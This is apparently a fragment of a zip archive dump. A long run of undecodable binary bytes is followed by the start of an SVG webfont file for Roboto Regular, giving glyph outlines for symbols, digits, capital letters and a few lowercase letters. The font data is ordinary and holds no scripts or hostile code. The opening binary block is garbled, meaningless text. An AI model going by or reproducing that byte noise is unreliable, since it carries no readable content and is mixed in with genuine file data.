�� �'Q^���ׅ��S��<��=�rE�#k�{�TB�T�!W͝�ox�o��G5B�͘N���-fFiT�dH��h1�t�.��hw����ʜt+S�����98o+��H�Jt��J�.����OFk��E�^uS�{ßső�
n|_)���D^�}J޿�FY����v�sP+�0�'2/t�r͏k"�Yw�US����4��dR�\� ��(�~�%}�-�&<?tT�l�m�T#>C��"��CU
A�VJ�]e�0�'&T���n�mi������Eu��:<�bA]�$lp}��Q�…��b�ΞS870p�Ð�$�O
'&.l�����n|I�7��DѦs��*w��Şi�ν;�w{�Z�����pr?�[�Z$1���&��58�_#z�W'/=,u��E�}ϣ�W��$��ߠ~^�����`�I���U*��8c*"�T�Ī�Z.�%��ɮ��	�:n�LhuM#OvW�G2���Q� "�kb�G����2+��3�
OKn��b[��W��UI̚��J����	۹:@���	�����)A٥���l�����"[�f��6_�O]��a��/t#6b�1Um��`�ˑ��¡W�l>fÎ�2S�!S����\aDu�c�z�1mK^	�d� �-ġJTLw��X�eR��Z��'2��������lB���r���n�e����-
Rhu"���w�-N�,1��1�g�;0��}߃�c�x���l�!�ӗ�=�:�Y���e�9�59��.�?�R�\7���u��0CC��f�b���3�k�󻾳S�h	������+',L����T�����Uu������᠛p>G�:I�����YH���*����EI�̄�+�P�Ҋf9�
;Y��
~Fq#+s�O��:jf�V�o��ȷS���I�g��0��o/��1��5�`�iXyF㿡���%+=$�=s��bׅ���/�Z=�O���ީO��v�ͬQhG�4��<A�6�6���_�/L�����fT��n쎩�"z�>���m�yÁ�m_Ojg2?s��;xe^vfF;�Q�������ʠ��,�pW�$ٝ=��v��ga��a,�Q	��O�9��[�����ǽ�)�����h.��q`���,�E�H�N��>��п۷E�O�����a<Gچ4{�#�|�'�y!��Z�=��ItU�+ [3>�}�4A����I��2��5��5��p��D~���1F�pGv���n	�4tx�X�Jx�a�ɿ�\�4�-0��R�?�z:��tM8�s�ޖ�YFj�C�ڎ$%��WN���3q�>m�����������
�-�tV\��G?_]O��T5�f;�y����z(�x`��n� ��PR�>������
ͷ�J�*�L�H�Kf�q|�D���N��r�xz����!���ȯK�n��'!�H�2J�?��.�pqPX;�p|�ce���dYF8�Epj�X40ؠk[������� xUk;^��Ѷ��z�)!�k6.01i������9�
L�Bt㭥H.]t��7#�F��(S�֊�U�W�Ň �a1D!L#׬��V����Z��e�<��q��=�ޙU'%7�VR&�C&Q�K��/`�l��'Lm�$�'�|�YΪ_"�a���sy��._�/��sA�C۩�+���D�uJ�O;sLI��0�Җ���U�$,rk��X)����Q&�q<Ý��V'5G���"xr��aR%��(Yn�ƭ�#�|��ٓ� �GZq���<�
�ZWujO��5���R���O(�*�\��r1b>J�K�)x@�Iu�ʪ�JnRXӑ�"x�8���E�G+�����x+�H<�|t2�0�%�~
]_g�E�.{���JI��Iw(ï��Z�-�iF����*a+P��V1J+NwL���ϓ;�����v�������d`�5�K����`�zf_*���`ֹn���\��i��.g�z��؞���B��8�H07+R|�@�XsUԷ��| �]��_:0w`
� ջ5.����u�7��G���ە�Ȓ�	򇵠�
!�V�)q���h)G���A�h�x�R|���9!����8������Ell�gZ̔�f���x{�y%��<��$h�I|��R�9j��	�"��USpV�����Vq&��iԕ:����$.�/��jKYO����|�! f�iRKd�s��(%�F�+iH��w�nY�'i��|���@>�G�
�v��KJ��a�kD?�~*�Wn�mm~zٯ�S�7��PdN֨��
`wQ,*�m����C`5{|ng[@x�ݪ��{�B�F�l7�A��� ˟�Eo�^欧!uM��q�ܱpN�fU�0�,�2�.�bfg�R��i��/ �P1��oD��5?b�_}����s�}��lޛ����=�;���XE���K��;�/��1�#F��7<��=^I:F�)�a��6����'�>������^x;������0h&��i��/!U~�yO��k�!�����vs��O�no9�:�-g|n!n�[��_\����C��
5����?qy��L�/ψ�rRj��EBW�v����5-:7�%��m�)n�6�dٔ��s&J�$�P�44D&ZcPٺL��F��#NWHNx�=���Q���Q�p-�UV�2���"���8����uqL��Mc�G�w
��0n��-���F�Gɇ��~h�0��5���l��9���T��nc�娵��~��0dTW$V6~8Tb-�v���0걧kY�a1vdW�-�z��G"8Z���X��?�}�|�\�V�>�a7Vr(�ڑ*M��d𰘅RН��&��5�<`��;����m���}�q�r!�Sr�A�*�N��P`�у��|��2��Sь�
�Ne�g�ϭ�4%z��?d�ߧ5�]6�Y9���K��,�g�s��%�����F�ʄ�����r�j؀�]�o	�6{m��g�:�����kp�7��N�\�8!-�j��b�O¿�p�'%�2����k<#Fq�i7��I�[{�!G�4י�n�E�%���l.� 4^j�
#Ѧ�l�MF�Q�b�cb�t��J3v���Md{�\�/E��b��g=����d�e^]�֢�kDG(C��X�`�H��mوc蓝&��Yv0&)���K�U��H��3x��.;�+dQ#7>�	���%���.R�4���w�]�75����}��S�M�ְ�;�;sVe��g��S�
Ӄ���5v�t�Xc�E���ڃ�X�����P���u,�׃���r?��<�a���Ʀƾƺ�1�[�J�Q���uhچ���]2rFg���S��(G:g�t
G:;mW:��,c�@�.�nY�,D�s΂Y�Ms�3�8�|>
�h�1��$M݈G�N�d��m���:�qU�0
����'S׊�<p$�j,�tݳ����=�.���0��<�rwt�d�!��V�Wv{o�j�gR�!�D�䉌,����Y<�{!nQ�W\j7(���3�LlDH
E*�������<[��nd#."$,���~�cxk*�g�qx���_�L!���|a�Qh�������M*iK�J
caiN#��jf7���mwI~�)c��mq\�(�ep!O�d�M|�.jm ��	d��f|5�G�M�-gu.TC�μ�~ȦX��R�"cFQB�U(���-���K[=G�]3���I�Z�}^�È��?2rb�ܴ:��e��C
�翾_H��ھ�?q�]��3,R_��{e��}Hz0�T���p%��x�������"�!ьUyU_�ج5�Ãm�,��X�ԯ*�?�Ei����=�}�H��s3�4��*hE������d�ݼnV3Y�p���.,���F$'srC��U��N-���(+���v��|�ZD�vP;��oʯ�;�m̯YC&Ȋ%�5�N��z��}\��~2'pj}��Z:�U!��mA�N��KXB�}�.�5����~8�F����e��X��w�F�"s4�wB���#g�be
#�R���9F]8X�R2���[4$Ef]$���H�.��:�#
ۆ���G�bdCNrۂ
5!o]�]6g{3 L�>ƀ̾I`�\Ow_H�YJN$�� ��D!œzՍ�#g�7��B2Ω\����.9���u��z�O��`�[|�a)�A6��Hq!Q�Ѱ^�hXR%��ݎ��E0݄��!z�h��d'a�>���v���KtJeI$\�f�^B�4R�z㿌Ͱ���x�?�_���y��~g��:�~��N����Pk�G8�58	9I�?�g%����.�Z�$\=�*�b��Kn���f5ك]�i)��ɴ4��th��.�R!
���!fs�XmT1g� llBJmu]��h��]VPae]$�\�[�ku�=�8q2u�^
�x���L�s�u������m���pM�e*ܸL�z^|
[[ϙ��BI�[�d�N��H0�R�����s���(N���m�%�'Z�8u�Ix?B�g�@�h&j��Z1�)������o���"�K�����3L�&v$����ƫTME!���~��*6?/-CKf���޹�b4�.����w�R��ʕY�ĵ��V4�����p%�.-�l�]cSDPi���#�z�1��Z�֌��in�I�Zw��+X2�/���&q7�H.)xN"�L}���PVQu��J�/'KGi*�T�m�uڂ�+-�[$��M8�34B�qS��?�4��%�&����$��=k�w�ݤ��M�+����C	 p����l$��;.U%��v�i�N.T�º�[Իfbj�s%8Mz'�U�U��s$�Y8ǂ#��!��a����W m��5��ɥ�El���+Ƴv9��M���́�o�6
:l�i��o^I��$��>hf�Y�`�DpZ1He6+$&����3_:눭���~Tg
?�s�$Օ��ذ��w#|~�2�Z�������X��]X����fƘ@KI
�zj8ԣ��j�	��5�qQ5/l��3#�P�y��g���մ�2���R��~�	�|��`պA6�I,֤�d
�z��3��-��p�{]��Zk�>���1nκ��)L<��,�a����]�q���zgί��B��B�W0F%4BRo�鷜mɎ`�СrQp���GW��_9�r]f�YlcC���p��_B�`1�-���rT�h4�K��VW>
b�����FS#�ȜP��<�
.!�	�j��S�(ث7�̾�'U.��ȹ2T1�M�&�ڶ��eͭ-��"�sL�̂R,I��RUC
(���7�M}]lO��a��$	8�uQ���t��z��/��
�����5��2��K��	F
g<�˄F�}�,��t8�
R�A��}�,����ʺ��¢��M�#s�F�ƥ��4�(B�dBX[�~��f�0vl�a�Ăj�q+M2�xؒxaD�י�P)�tZ�]_��%
��y$*Uq��Μ����f�eU�iʘ�r���v�i����	'�O��Eت�.F��\V�:��|��2{a�����tE��3.�.��P�V�	>9��+�P�bb�ͮ<'^=3B�Z�2��B��gkG���=�	�͐���20�A�����58j
݁���֊�{G�܌C�[�lO6DV
�x$�`Dd��Dꮕ8�"�'M��+v��Q�$�Y>��	-���1'��\��4AD���I�x<![0�h)�߇G�zpЙb��WP
�[��ܮzև��
M�"kjW8���S����&M�z�Ē�AAZ�x�8���c���C:����U���E�&p&��J��.�I?/�q%纮bz_��o��7D,�Z��'���a��ݍ�_sV� �Ŕ!@��x�=N4Y�JxGFk���攈*N۬@����IT:Z212[1���t�l���)qTP�;�K�SY����4��Gȶ�����*��2�E�Զr�4�Ʈec"��1���K�������"�Z�(zw��2���C�pV��1�H�`y�1��P�Y�F>������n�~�l���qӝ3@��y��/�0�
�
7f���P_����R��pXKP}�^�[�4r���)�PU�]�w
X����)C������Ȅ^z{{�u~���S)�'A�AC�������0�4*kAD�3����D���8�`k��	
�d���blb}�P��iҵs��$�������1�)�����sPjx��>��]��d��{�#f]�ڳ��0+��&���#w�
U6h;Y@�a�8�p�t@�_��x��+��|d�В
�\��?WG��a*�����%�WTYi8��C�ۥߣ�)�}~u���16'v@v`��Z0�蠀�4���Ŕ�Px�׮Ԩ�;�2X3G�96g���
B�N�|��Y�{��ՍRo�Ju7=�����������uo]ݒ����puǜ1�٨��\�]۞,����}��C��@�b�������jl��7�?\�uSbɜ�e�ט��s��^l��>r*v�g3<���N�d�/��#CV~����͸jW�~�V}�/|�yW���8[�bᬞ�^�jG@��Va����P���1MN��hU;›�N� i�����4V�3$��ױ*ԃjt��C;"=4�Dˬ����3�@�b��(�bϖ��,���|��R�����!�͆�Y��Y"��D�b�r��6O֗^
'��+3[�b�>A�Bȹ�8�A�=r�u����,�\��R� S��`����	��]��O�-��^(��'M�CɀZ�Bه�[zV�R��IJ8Y`]0�*[$��V��m,%���T�#92�p��n��R%l�	�'�������?.dK�w�1�kjy���$-1�86��둶���}���^�f*��2ӣ�M;�|l���γ�0��h��͍Uv��[��;�ٟo�[��k�gǚ���z;�܎�ph粛�S$�+��9�'�_ֱ��O�>*'�;��(b�$��_iT��z|�A
B�s�a%t��UW+��YPK!}��5��Cit_sanctum/fonts/roboto_regular_macroman/Roboto-Regular-webfont.svgnu&1i�<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<svg xmlns="http://www.w3.org/2000/svg">
<metadata></metadata>
<defs>
<font id="robotoregular" horiz-adv-x="1164" >
<font-face units-per-em="2048" ascent="1638" descent="-410" />
<missing-glyph horiz-adv-x="509" />
<glyph unicode="&#xfb01;" horiz-adv-x="1140" d="M28 936v146h170v117q0 182 106.5 282t295.5 100q67 0 132 -15.5t153 -45.5l-34 -160q-53 21 -113 36t-123 15q-117 0 -168.5 -52t-51.5 -160v-117h215v-146h-215v-936h-197v936h-170zM783 0v1082h198v-1082h-198z" />
<glyph horiz-adv-x="2048" />
<glyph horiz-adv-x="2048" />
<glyph unicode="&#xd;" horiz-adv-x="509" />
<glyph unicode=" "  horiz-adv-x="509" />
<glyph unicode="&#x09;" horiz-adv-x="509" />
<glyph unicode="&#xa0;" horiz-adv-x="509" />
<glyph unicode="!" horiz-adv-x="539" d="M171 0v204h198v-204h-198zM171 478v978h197v-978h-197z" />
<glyph unicode="&#x22;" horiz-adv-x="668" d="M80 1040l1 240v280h197v-270l-101 -250h-97zM389 1040l1 248v272h197v-270l-101 -250h-97z" />
<glyph unicode="#" horiz-adv-x="1276" d="M70 410v140h264l68 348h-256v142h284l82 416h151l-82 -416h255l82 416h151l-82 -416h199v-142h-226l-68 -348h219v-140h-247l-80 -410h-152l80 410h-255l-80 -410h-151l80 410h-236zM485 550h255l68 348h-255z" />
<glyph unicode="$" horiz-adv-x="1153" d="M114 424l2 5h190q0 -154 77.5 -219.5t190.5 -65.5q129 0 201.5 61.5t72.5 170.5q0 89 -64 153t-210 114q-202 61 -305 163t-103 272q0 165 94.5 269t260.5 125v221h158v-222q168 -24 260.5 -143.5t92.5 -320.5h-196q0 136 -63 220t-175 84q-118 0 -176.5 -61.5 t-58.5 -168.5q0 -97 60.5 -157t218.5 -114q205 -66 304 -164.5t99 -267.5q0 -172 -103 -273.5t-283 -120.5v-192h-157v191q-172 18 -282 125.5t-106 315.5z" />
<glyph unicode="%" horiz-adv-x="1498" d="M104 1099v77q0 127 82 214t219 87t219 -86.5t82 -214.5v-77q0 -127 -81.5 -213t-217.5 -86q-138 0 -220.5 86t-82.5 213zM250 1099q0 -74 40.5 -125.5t116.5 -51.5q73 0 113 51t40 126v77q0 74 -40.5 126.5t-114.5 52.5q-75 0 -115 -52.5t-40 -126.5v-77zM349 177 l711 1138l109 -67l-711 -1138zM809 279v78q0 127 82 213.5t219 86.5q136 0 218.5 -86.5t82.5 -213.5v-78q0 -128 -82 -214t-217 -86q-138 0 -220.5 86t-82.5 214zM955 279q0 -75 40.5 -126.5t116.5 -51.5q73 0 113 51.5t40 126.5v78q0 74 -41 126t-114 52q-74 0 -114.5 -52 t-40.5 -126v-78z" />
<glyph unicode="&#x26;" horiz-adv-x="1276" d="M64 392q0 122 70.5 213.5t210.5 183.5q-78 99 -116 176.5t-38 159.5q0 169 97.5 260.5t268.5 91.5q158 0 257 -91t99 -219q0 -98 -52.5 -169.5t-155.5 -146.5l-109 -80l340 -409q41 65 64 144t23 167h176q0 -132 -39 -244t-113 -201l185 -223l-2 -5h-229l-85 102 q-80 -60 -177 -91.5t-201 -31.5q-217 0 -345.5 115t-128.5 298zM261 392q0 -113 71 -186t206 -73q72 0 142 24.5t132 70.5l-361 435l-40 -29q-91 -68 -120.5 -130t-29.5 -112zM388 1127q0 -53 27 -110.5t81 -125.5l138 95q57 38 77.5 82.5t20.5 98.5q0 61 -48.5 108 t-126.5 47q-81 0 -125 -56.5t-44 -138.5z" />
<glyph unicode="'" horiz-adv-x="359" d="M80 1055l1 265v240h197v-223l-101 -282h-97z" />
<glyph unicode="(" horiz-adv-x="679" d="M132 582v9q0 394 159 673t334 372l6 -1l38 -116q-137 -107 -238.5 -343t-101.5 -583v-13q0 -347 101 -583t239 -352l-38 -108h-6q-175 93 -334 371.5t-159 673.5z" />
<glyph unicode=")" horiz-adv-x="687" d="M6 -355q135 105 237.5 345.5t102.5 589.5v13q0 342 -105.5 583.5t-234.5 351.5l38 108h6q174 -93 333.5 -372t159.5 -673v-9q0 -395 -159.5 -673.5t-333.5 -371.5h-6z" />
<glyph unicode="*" horiz-adv-x="884" d="M28 1071l49 154l296 -111l-10 342h161l-10 -348l293 110l48 -156l-302 -89l193 -270l-131 -96l-181 287l-176 -279l-132 93l198 274z" />
<glyph unicode="+" horiz-adv-x="1162" d="M78 605v178h402v423h197v-423h399v-178h-399v-459h-197v459h-402z" />
<glyph unicode="," horiz-adv-x="404" d="M48 -258l70 316v163h197v-173l-150 -306h-117z" />
<glyph unicode="-" horiz-adv-x="561" d="M35 538v154h490v-154h-490z" />
<glyph unicode="." horiz-adv-x="548" d="M161 0v202h197v-202h-197z" />
<glyph unicode="/" horiz-adv-x="850" d="M16 -125l608 1581h167l-607 -1581h-168z" />
<glyph unicode="0" horiz-adv-x="1154" d="M113 555v345q0 278 124.5 427.5t338.5 149.5q215 0 339.5 -149.5t124.5 -427.5v-345q0 -279 -123.5 -427.5t-338.5 -148.5t-340 149t-125 427zM310 515q0 -189 69 -285.5t199 -96.5t197.5 96t67.5 286v427q0 189 -68.5 284.5t-198.5 95.5t-198 -95.5t-68 -284.5v-427z " />
<glyph unicode="1" horiz-adv-x="1153" d="M186 1260v142l495 54v-1456h-197v1264z" />
<glyph unicode="2" horiz-adv-x="1153" d="M97 1033q-5 188 125 316t360 128q196 0 312.5 -114.5t116.5 -291.5q0 -119 -70.5 -238.5t-197.5 -256.5l-383 -417l2 -5h700v-154h-944v135l477 530q128 143 173.5 227t45.5 172q0 109 -63.5 183.5t-168.5 74.5q-151 0 -222.5 -77.5t-71.5 -217.5h-189z" />
<glyph unicode="3" horiz-adv-x="1153" d="M100 378l3 6h188q0 -115 70.5 -183t193.5 -68q125 0 196 68t71 201q0 135 -63 199t-199 64h-172v154h172q131 0 185.5 65.5t54.5 182.5q0 125 -62 190t-183 65q-115 0 -184.5 -67.5t-69.5 -179.5h-189l-2 6q-5 165 119.5 280.5t325.5 115.5q202 0 322 -107.5t120 -306.5 q0 -90 -54.5 -179.5t-163.5 -136.5q131 -43 185.5 -135t54.5 -206q0 -199 -130.5 -313t-333.5 -114q-199 0 -329.5 107.5t-125.5 291.5z" />
<glyph unicode="4" horiz-adv-x="1153" d="M55 336v111l642 1009h208v-966h201v-154h-201v-336h-196v336h-654zM265 490h444v683l-6 1l-19 -50z" />
<glyph unicode="5" horiz-adv-x="1153" d="M157 377l2 6h178q0 -119 68.5 -184.5t177.5 -65.5q125 0 194 88t69 241q0 140 -70 230t-193 90q-116 0 -168 -35t-76 -107l-164 17l84 799h729v-175h-562l-48 -409q46 34 102.5 56.5t130.5 24.5q201 2 316.5 -131t115.5 -358q0 -219 -117.5 -352t-342.5 -133 q-185 0 -308 101t-118 297z" />
<glyph unicode="6" horiz-adv-x="1153" d="M132 571v278q0 280 156 454t387 174q75 0 148.5 -17t121.5 -43l-42 -151q-49 25 -102.5 40.5t-125.5 15.5q-156 0 -251.5 -125t-95.5 -326v-23q64 56 146.5 87.5t177.5 31.5q195 0 311 -135t116 -342q0 -226 -123.5 -368.5t-329.5 -142.5q-214 0 -354 155t-140 437z M328 552q0 -201 85 -310t213 -109q121 0 188.5 102.5t67.5 254.5q0 144 -72.5 237t-201.5 93q-101 0 -172 -41t-108 -109v-118z" />
<glyph unicode="7" horiz-adv-x="1153" d="M77 1301v155h985v-155q-264 -314 -356.5 -556.5t-133.5 -587.5l-16 -157h-197l16 157q42 344 163 615t331 529h-792z" />
<glyph unicode="8" horiz-adv-x="1153" d="M102 394q0 123 74 217t200 138q-109 42 -171 127.5t-62 199.5q0 192 118.5 296.5t313.5 104.5q192 0 313.5 -104.5t121.5 -296.5q0 -114 -64 -199.5t-173 -127.5q126 -44 201.5 -138t75.5 -217q0 -202 -131.5 -308.5t-341.5 -106.5q-214 0 -344.5 106.5t-130.5 308.5z M299 398q0 -124 76 -194.5t202 -70.5q123 0 200 71t77 194q0 120 -79 197t-200 77q-123 0 -199.5 -77t-76.5 -197zM340 1072q0 -111 65.5 -178t171.5 -67q104 0 170 67t66 178q0 108 -67.5 179t-170.5 71q-105 0 -170 -68.5t-65 -181.5z" />
<glyph unicode="9" horiz-adv-x="1153" d="M83 978q0 219 131.5 359t319.5 140q228 0 359.5 -142.5t131.5 -419.5v-347q0 -285 -142.5 -437t-371.5 -152q-77 0 -156.5 14.5t-142.5 44.5l30 151q59 -31 122.5 -43.5t146.5 -12.5q144 0 230.5 109t86.5 324v66q-49 -71 -122.5 -107.5t-163.5 -36.5q-211 0 -335 130.5 t-124 359.5zM280 978q0 -150 70.5 -243t191.5 -93q109 0 181.5 47t104.5 120v126q0 191 -73.5 289t-214.5 98q-108 0 -184 -96.5t-76 -247.5z" />
<glyph unicode=":" horiz-adv-x="517" d="M161 0v202h197v-202h-197zM161 876v202h197v-202h-197z" />
<glyph unicode=";" horiz-adv-x="525" d="M99 -258l70 316v163h197v-173l-150 -306h-117zM162 876v202h197v-202h-197z" />
<glyph unicode="&#x3c;" horiz-adv-x="1040" d="M71 466v149l816 378v-201l-559 -233l-85 -18v-6l85 -19l559 -228v-201z" />
<glyph unicode="=" horiz-adv-x="1153" d="M152 407v164h834v-164h-834zM152 823v164h834v-164h-834z" />
<glyph unicode="&#x3e;" horiz-adv-x="1072" d="M136 87v196l598 238l85 17v6l-85 20l-598 234v195l856 -378v-149z" />
<glyph unicode="?" horiz-adv-x="974" d="M61 1122q-3 161 113.5 258t296.5 97q197 0 306 -100.5t109 -280.5q0 -129 -70.5 -236t-186.5 -219q-54 -54 -65.5 -97t-11.5 -134h-197q1 145 25 201t126 148q99 117 141 180t42 152q0 106 -56.5 163t-161.5 57q-91 0 -155 -49.5t-64 -145.5h-188zM353 0v208h206v-208 h-206z" />
<glyph unicode="@" horiz-adv-x="1833" d="M114 478q19 423 249 688t602 265q379 0 581.5 -250t185.5 -679q-9 -214 -120 -368.5t-332 -154.5q-73 0 -126 41.5t-76 117.5q-50 -80 -122 -119.5t-168 -39.5q-125 0 -194 120.5t-51 316.5q23 259 137.5 415.5t279.5 156.5q105 0 169 -26t139 -80l-4 -4h6l-51 -585 q-9 -110 21.5 -151.5t81.5 -41.5q123 0 197 113.5t82 288.5q16 382 -144 595.5t-496 213.5q-308 0 -495.5 -231t-202.5 -602q-18 -376 150 -594.5t482 -218.5q88 0 178.5 21.5t152.5 56.5l38 -107q-67 -42 -170.5 -65.5t-202.5 -23.5q-380 0 -587.5 249.5t-189.5 681.5z M720 416q-11 -142 21.5 -216t106.5 -74q64 0 117 24.5t97 87.5q-1 12 -0.5 25.5t2.5 29.5l47 538q-26 12 -54.5 19t-59.5 7q-125 0 -191 -109.5t-86 -331.5z" />
<glyph unicode="A" horiz-adv-x="1326" d="M20 0l563 1456h169l554 -1456h-201l-136 375h-610l-138 -375h-201zM420 540h490l-240 663h-6z" />
<glyph unicode="B" horiz-adv-x="1309" d="M180 0v1456h475q228 0 357 -98.5t129 -295.5q0 -97 -62 -173.5t-163 -113.5q132 -28 207.5 -129t75.5 -235q0 -200 -129.5 -305.5t-351.5 -105.5h-538zM377 154h341q134 0 209 66.5t75 188.5q0 128 -62.5 201t-192.5 73h-370v-529zM377 837h319q110 0 179 60.5t69 168.5 q0 118 -74.5 176.5t-214.5 58.5h-278v-464z" />
<glyph unicode="C" horiz-adv-x="1297" d="M118 598v259q0 269 155.5 444.5t402.5 175.5q247 1 393 -131q142 -128 142 -337v-12l-2 -6h-189q0 153 -90 242t-254 89q-165 0 -263 -133t-98 -330v-261q0 -199 98 -332t263 -133q164 0 254 88.5t90 244.5h189l2 -6v-11q0 -198 -144 -332q-148 -138 -391 -138 q-247 0 -402.5 175t-155.5 444z" />
<glyph unicode="D" horiz-adv-x="1349" d="M180 0v1456h447q286 0 459 -175.5t173 -453.5v-199q0 -279 -173 -453.5t-459 -174.5h-447zM377 154h250q202 0 318.5 133t116.5 341v201q0 206 -116.5 339t-318.5 133h-250v-1147z" />
<glyph unicode="E" horiz-adv-x="1197" d="M180 0v1456h955v-155h-758v-471h667v-155h-667v-521h769v-154h-966z" />
<glyph unicode="F" horiz-adv-x="1193" d="M180 0v1456h963v-155h-766v-502h664v-155h-664v-644h-197z" />
<glyph unicode="G" horiz-adv-x="1396" d="M120 578v300q0 265 159 432t410 167q250 0 393 -123t146 -317l-2 -6h-188q-9 127 -96.5 209t-252.5 82q-167 0 -269 -125t-102 -317v-302q0 -194 114 -319.5t290 -125.5q124 0 203 33t113 75v331h-319v155h516v-534q-52 -80 -180.5 -147t-332.5 -67q-261 0 -431.5 167 t-170.5 432z" />
<glyph unicode="H" horiz-adv-x="1461" d="M180 0v1456h197v-658h707v658h197v-1456h-197v643h-707v-643h-197z" />
<glyph unicode="I" horiz-adv-x="579" d="M190 0v1456h198v-1456h-198z" />
<glyph unicode="J" horiz-adv-x="1130" d="M66 395l2 6h189q0 -135 68.5 -201.5t193.5 -66.5q109 0 178 73.5t69 196.5v1053h197v-1053q0 -195 -123.5 -309.5t-320.5 -114.5q-210 0 -334 107q-119 102 -119 293v16z" />
<glyph unicode="K" horiz-adv-x="1317" d="M180 0v1456h197v-644h152l521 644h218l3 -5l-565 -699l606 -747l-3 -5h-235l-527 657h-170v-657h-197z" />
<glyph unicode="L" horiz-adv-x="1106" d="M180 0v1456h197v-1302h689v-154h-886z" />
<glyph unicode="M" horiz-adv-x="1799" d="M180 0v1456h252l464 -1183h6l464 1183h252v-1456h-197v576l20 592l-5 1l-472 -1169h-131l-470 1166l-5 -1l19 -589v-576h-197z" />
<glyph unicode="N" horiz-adv-x="1461" d="M180 0v1456h197l701 -1124l6 2v1122h197v-1456h-197l-701 1126l-6 -2v-1124h-197z" />
<glyph unicode="O" horiz-adv-x="1396" d="M113 598v259q0 266 159.5 443t414.5 177q264 0 429.5 -176.5t165.5 -443.5v-259q0 -267 -165.5 -443t-429.5 -176q-255 0 -414.5 176t-159.5 443zM310 598q0 -202 102.5 -330t274.5 -128q183 0 290.5 127.5t107.5 330.5v261q0 200 -108 328t-290 128q-172 0 -274.5 -128 t-102.5 -328v-261z" />
<glyph unicode="P" horiz-adv-x="1312" d="M180 0v1456h557q233 0 362 -120t129 -316q0 -199 -129 -317.5t-362 -118.5h-360v-584h-197zM377 738h360q148 0 221 79.5t73 200.5t-73.5 202t-220.5 81h-360v-563z" />
<glyph unicode="Q" horiz-adv-x="1396" d="M113 598v259q0 266 159.5 443t414.5 177q264 0 429.5 -176.5t165.5 -443.5v-259q0 -142 -50 -263t-140 -205l247 -233l-135 -129l-276 257q-56 -23 -116.5 -34.5t-124.5 -11.5q-255 0 -414.5 176t-159.5 443zM310 598q0 -202 102.5 -330t274.5 -128q183 0 290.5 127.5 t107.5 330.5v261q0 200 -108 328t-290 128q-172 0 -274.5 -128t-102.5 -328v-261z" />
<glyph unicode="R" horiz-adv-x="1357" d="M180 0v1455h527q239 0 365 -106t126 -308q0 -112 -58.5 -195t-170.5 -132q120 -39 172.5 -126.5t52.5 -216.5v-137q0 -68 15 -122t52 -88v-24h-203q-39 34 -50 100t-11 136v133q0 118 -69 190t-185 72h-366v-631h-197zM377 786h310q167 0 240.5 63.5t73.5 193.5 q0 123 -71.5 190.5t-222.5 67.5h-330v-515z" />
<glyph unicode="S" horiz-adv-x="1277" d="M102 413l2 6h188q0 -140 103 -213t255 -73q149 0 236 63t87 171q0 100 -75 167.5t-266 113.5q-231 55 -360.5 162t-129.5 269q0 170 139.5 284t361.5 114q239 0 381 -131q137 -127 136 -292v-12l-2 -6h-188q0 128 -84.5 207t-242.5 79q-147 0 -225.5 -66.5t-78.5 -173.5 q0 -95 85 -158.5t276 -111.5q230 -57 350 -168t120 -275q0 -176 -144 -283t-376 -107q-218 0 -386 118q-163 115 -162 305v11z" />
<glyph unicode="T" horiz-adv-x="1200" d="M34 1301v155h1132v-155h-468v-1301h-197v1301h-467z" />
<glyph unicode="U" horiz-adv-x="1386" d="M147 469v987h197v-987q0 -165 94 -250.5t248 -85.5q162 0 261.5 85.5t99.5 250.5v987h197v-987q0 -238 -154.5 -364t-403.5 -126q-240 0 -389.5 126.5t-149.5 363.5z" />
<glyph unicode="V" horiz-adv-x="1295" d="M22 1456h214l376 -1094l33 -115h6l33 115l376 1094h213l-541 -1456h-169z" />
<glyph unicode="W" horiz-adv-x="1809" d="M54 1456h196l222 -952l27 -182l6 -1l39 183l267 952h174l269 -952l40 -187h6l29 187l217 952h197l-351 -1456h-176l-287 1010l-26 131h-6l-25 -131l-292 -1010h-176z" />
<glyph unicode="X" horiz-adv-x="1295" d="M66 0l472 734l-462 722h236l338 -568l340 568h238l-462 -722l472 -734h-235l-349 578l-350 -578h-238z" />
<glyph unicode="Y" horiz-adv-x="1250" d="M20 1456h225l380 -740l380 740h225l-511 -944v-512h-196v525z" />
<glyph unicode="Z" horiz-adv-x="1225" d="M97 0v146l778 1155h-767v155h992v-141l-781 -1161h814v-154h-1036z" />
<glyph unicode="[" horiz-adv-x="552" d="M143 -312v1976h385v-155h-188v-1666h188v-155h-385z" />
<glyph unicode="\" horiz-adv-x="846" d="M39 1456h186l608 -1581h-186z" />
<glyph unicode="]" horiz-adv-x="552" d="M11 -157h189v1666h-189v155h386v-1976h-386v155z" />
<glyph unicode="^" horiz-adv-x="856" d="M61 729l299 727h134l298 -727h-181l-166 419l-16 70h-6l-16 -70l-163 -419h-183z" />
<glyph unicode="_" horiz-adv-x="931" d="M4 0h923v-154h-923v154z" />
<glyph unicode="`" horiz-adv-x="641" d="M82 1471l3 6h230l175 -266h-158z" />
<glyph unicode="a" horiz-adv-x="1126" d="M106 304q0 155 125.5 242.5t340.5 87.5h214v107q0 95 -58 150.5t-164 55.5q-95 0 -154.5 -48.5t-59.5 -116.5h-188l-2 6v11q0 111 112 205q118 98 303 98q184 0 296 -93.5t112 -269.5v-521q0 -58 6 -112t22 -106h-203q-10 49 -15.5 86.5t-6.5 75.5q-55 -78 -143.5 -130.5 t-190.5 -52.5q-169 0 -257.5 86.5t-88.5 238.5zM303 300q0 -72 45 -114t133 -42q107 0 193 55t112 126v176h-221q-119 0 -190.5 -60t-71.5 -141z" />
<glyph unicode="b" d="M143 0v1560h197v-606q51 72 126.5 110t176.5 38q200 0 312 -160t112 -421v-21q0 -234 -112.5 -377.5t-309.5 -143.5q-107 0 -186 41.5t-131 122.5l-24 -143h-161zM340 309q38 -80 99.5 -125t155.5 -45q139 0 207 99t68 262v21q0 186 -68.5 303.5t-208.5 117.5 q-91 0 -153.5 -44.5t-99.5 -119.5v-469z" />
<glyph unicode="c" horiz-adv-x="1087" d="M97 520v42q0 231 125.5 385.5t360.5 154.5q191 0 311 -112q117 -108 116 -265v-10l-2 -6h-178q0 99 -70 168.5t-177 69.5q-155 0 -221.5 -111.5t-66.5 -273.5v-42q0 -166 66 -276.5t222 -110.5q98 0 172.5 60.5t74.5 148.5h177l2 -6v-10q-1 -134 -125 -238 q-130 -108 -301 -109q-236 0 -361 154t-125 387z" />
